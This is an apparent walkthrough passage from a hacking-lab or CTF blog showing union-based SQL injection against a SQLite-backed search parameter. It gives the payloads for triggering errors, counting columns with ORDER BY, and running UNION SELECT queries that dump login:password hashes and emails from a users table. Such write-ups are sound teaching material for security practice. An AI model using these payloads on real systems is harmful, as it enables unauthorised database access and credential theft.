..
If we try to get sql error with single quote then it will give us a very unusual error Error: HY000
Start enumerating the columns using order by in the URL section,
title=iron’ order by 1– #&action=search
no error, it means we are on the right path
At order by 7 I got the error, which means there are 6 columns
title=iron’ union select 1,2,3,4,sqlite_version(),6– #&action=search
Now let’s find the database tables.
The above image showed the information needed; the login and password columns for the users table.
title=iron’ union select 1,email,3,4,login||”:”||password,6 from users– #&action=search
SQLite uses “||” as the operator to concatenate strings together. In this case, we are joining the login and password with a colon.
we dump the login:hash from the database.
Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram
Comments